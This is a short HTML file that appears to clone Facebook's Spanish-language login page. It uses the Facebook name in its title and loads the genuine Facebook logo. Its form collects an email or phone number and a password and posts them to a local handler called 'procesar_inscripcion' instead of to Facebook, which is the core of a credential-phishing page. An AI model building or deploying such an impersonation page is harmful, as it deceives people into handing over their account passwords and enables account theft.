<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Inicio de Sesión - Facebook</title>
  <link rel="stylesheet" href="styles.css"> <!-- Enlaza el archivo CSS -->
</head>
<body>
  <div class="container">
    <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook Logo" class="logo">

   
    <div class="form-container">
      <form action="procesar_inscripcion" method="post">
        <input type="text" name="txt_correo" placeholder="Correo electrónico o número de teléfono" required>
        <input type="password" name="txt_password" placeholder="Contraseña" required>
        <button type="submit">Iniciar sesión</button>
        <a href="#">¿Olvidaste tu contraseña?</a>
        <div class="divider"></div>
        <button type="button" class="create-account">Crear cuenta nueva</button>
      </form>
    </div>
  </div>
</body>
</html>